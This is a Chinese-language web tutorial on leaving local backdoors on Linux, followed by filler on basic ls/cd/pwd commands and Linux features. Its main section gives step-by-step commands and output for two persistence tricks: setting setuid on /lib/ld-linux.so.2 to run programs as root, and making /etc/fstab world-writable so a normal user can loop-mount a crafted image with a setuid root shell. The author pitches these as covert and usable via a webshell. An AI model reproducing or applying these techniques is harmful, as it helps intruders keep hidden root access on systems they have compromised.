Linux支持多用戶，各個用戶對于自己的文件設(shè)備有自己特殊的權(quán)利，保證了各用戶之間互不影響，有時為了便利或者某些安全需要，我們需要在本地留下后門，那么下面一起看看linux下留本地后門的兩個方法。

　　方法步驟

　　方法一：setuid的方法，其實8是很隱蔽?？纯催^程: [root@localdomain lib]# ls -l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linu

　　方法一：setuid的方法，其實8是很隱蔽。看看過程:

　　[root@localdomain lib]# ls -l |grep ld-linux

　　lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so

　　lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2

　　[root@localdomain lib]# chmod s ld-linux.so.2

　　[root@localdomain lib]# ls -l |grep ld-2.7.so

　　-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so

　　lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so

　　[root@localdomain lib]#

　　我們這里給/lib/ld-linux.so.2這個文件(在FC8里，它指向ld-2.7.so這個文件)加了setuid屬性。然后我們看怎么利用它。

　　普通用戶登錄，測試下權(quán)限：

　　[xiaoyu@localdomain ~]$ whoami

　　xiaoyu

　　[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`

　　root

　　[xiaoyu@localdomain ~]$

　　恩，嘿嘿 root了吧，具體怎么生成root shell，你們自己去想吧，凡事都不要點得太透，對吧。呵呵，可以肯定的一點，/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell， bash檢查euid 和uid，看是否相等...OK，不多說了。

　　方法二：

　　看過程:

　　[root@localdomain etc]# chmod a w /etc/fstab

　　[root@localdomain etc]#

　　這就留好了。此方法比較XXOXX，估計沒幾個管理員知道。利用方法演示下

　　[xiaoyu@localdomain ~]$ ls -l /etc/fstab

　　-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab

　　[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab

　　然后從本機把一個文件到目標機器上去，這里我們命名為test

　　[xiaoyu@localdomain tmp]$ ls -l test

　　-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test

　　[xiaoyu@localdomain tmp]$ mount test

　　[xiaoyu@localdomain tmp]$ cd /mnt

　　[xiaoyu@localdomain mnt]$ ls -l

　　total 18

　　drwx------ 2 root root 12288 2008-04-20 05:44 lost found

　　-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root

　　[xiaoyu@localdomain mnt]$ ./root

　　sh-3.2#

　　看到了吧，從普通用戶提升到root了。呵呵。

　　test這個文件baidu貌似木有上傳功能撒，木辦法傳

　　貌似可能有人說本地后門木啥鳥用，但是你要搞清楚：一個webshell里面就可以完成這一切....

　　補充：Linux基本命令

　　1.ls命令：

　　格式：：ls [選項] [目錄或文件]

　　功能：對于目錄，列出該目錄下的所有子目錄與文件;對于文件，列出文件名以及其他信息。

　　常用選項：

　　-a ：列出目錄下的所有文件，包括以 . 開頭的隱含文件。

　　-d ：將目錄像文件一樣顯示，而不是顯示其他文件。

　　-i ：輸出文件的i節(jié)點的索引信息。

　　-k ：以k字節(jié)的形式表示文件的大小。

　　-l ：列出文件的詳細信息。

　　-n ：用數(shù)字的UID,GID代替名稱。

　　-F : 在每個文件名后面附上一個字符以說明該文件的類型，“*”表示可執(zhí)行的普通文 件;“/”表示目錄;“@”表示符號鏈接;“l”表示FIFOS;“=”表示套接字。

　　2.cd命令

　　格式：cd [目錄名稱]

　　常用選項：

　　cd .. 返回上一級目錄。

　　cd ../.. 將當前目錄向上移動兩級。

　　cd - 返回最近訪問目錄。

　　3.pwd命令

　　格式： pwd

　　功能：顯示出當前工作目錄的絕對路徑。

　　相關(guān)閱讀：Linux主要特性

　　完全兼容POSIX1.0標準

　　這使得可以在Linux下通過相應(yīng)的模擬器運行常見的DOS、Windows的程序。這為用戶從Windows轉(zhuǎn)到Linux奠定了基礎(chǔ)。許多用戶在考慮使用Linux時，就想到以前在Windows下常見的程序是否能正常運行，這一點就消除了他們的疑慮。

　　多用戶、多任務(wù)

　　Linux支持多用戶，各個用戶對于自己的文件設(shè)備有自己特殊的權(quán)利，保證了各用戶之間互不影響。多任務(wù)則是現(xiàn)在電腦最主要的一個特點，Linux可以使多個程序同時并獨立地運行。

　　良好的界面

　　Linux同時具有字符界面和圖形界面。在字符界面用戶可以通過鍵盤輸入相應(yīng)的指令來進行操作。它同時也提供了類似Windows圖形界面的X-Window系統(tǒng)，用戶可以使用鼠標對其進行操作。在X-Window環(huán)境中就和在Windows中相似，可以說是一個Linux版的Windows。

　　支持多種平臺

　　Linux可以運行在多種硬件平臺上，如具有x86、680x0、SPARC、Alpha等處理器的平臺。此外Linux還是一種嵌入式操作系統(tǒng)，可以運行在掌上電腦、機頂盒或游戲機上。2001年1月份發(fā)布的Linux 2.4版內(nèi)核已經(jīng)能夠完全支持Intel 64位芯片架構(gòu)。同時Linux也支持多處理器技術(shù)。多個處理器同時工作，使系統(tǒng)性能大大提高。

linux下留本地后門相關(guān)文章：

1.有哪些方法可以檢查Linux是否被入侵

2.如何實現(xiàn)linux操作系統(tǒng)對計算機病毒的防護

3.PHP后門原理實現(xiàn)是怎樣的

4.Linux系統(tǒng)被入侵該如何檢測

5.Linux操作系統(tǒng)的基本安全措施